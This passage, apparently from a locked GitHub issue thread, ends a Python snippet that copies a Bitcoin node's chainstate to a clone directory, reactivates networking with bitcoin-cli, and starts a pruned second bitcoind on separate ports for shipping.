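        "/home/user/.bitcoin/chainstate", "/home/user/clone/")

    # 3. Resume the main node.
    run("bitcoin-cli", "setnetworkactive", "true")

    # 4. Start the clone on different ports with pruning enabled; once it
    #    has pruned the block files, it can be shut down and shipped.
    run("bitcoind", "-datadir=/home/user/clone", "-port=8444",
        "-rpcport=8445", "-prune=550", "-daemon")
    ```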

  66. bitcoin locked this on May 11, 2024
